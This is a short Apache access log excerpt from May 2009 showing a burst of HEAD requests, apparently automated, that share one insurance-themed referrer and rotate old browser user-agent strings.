89.149.207.79 - - [31/May/2009:09:27:50 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.7) Gecko/20040707 Firefox/0.9.2" 211 302
89.149.249.184 - - [31/May/2009:09:27:50 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts)" 193 302
89.149.234.43 - - [31/May/2009:09:27:50 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Neostrada Plus 5.6)" 197 302
89.149.249.186 - - [31/May/2009:09:27:50 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)" 215 302
89.149.207.79 - - [31/May/2009:09:27:50 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)" 181 302
89.149.234.43 - - [31/May/2009:09:27:50 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" 177 302
89.149.207.79 - - [31/May/2009:09:27:50 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 177 302
